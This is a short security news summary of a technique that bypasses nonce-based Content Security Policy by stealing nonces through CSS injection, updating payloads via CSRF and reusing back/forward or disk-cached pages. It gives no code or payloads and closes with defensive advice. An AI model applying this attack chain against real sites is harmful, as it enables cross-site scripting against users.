Browser Cache Exploit Bypasses Web Security Policy

Security researchers have identified a high-risk vulnerability that allows attackers to bypass Content Security Policy (CSP) protections by exploiting browser caching and HTML injection. This browser cache exploit bypasses nonce-based CSP implementations by manipulating how modern browsers store and reuse cached content, particularly through the back/forward cache (bfcache) and disk cache systems.

The attack begins with CSS injection to extract nonce values from meta tags, which remain accessible despite protections on script tags. Using CSS attribute selectors and overlapping background requests, attackers reconstruct complete nonce values. The browser cache exploit bypasses CSP by leveraging Cross-Site Request Forgery to update payloads, while reusing cached pages with known nonces. Through precise timing and cache partitioning, attackers trigger malicious payloads after navigating back to cached pages.

This method undermines one of the web’s core defenses against XSS. Security teams must reassess CSP strategies, considering stricter cache-control headers and nonce handling.

Read the full official report at

New Sophisticated Attack Bypasses Content Security Policy Using HTML-Injection Technique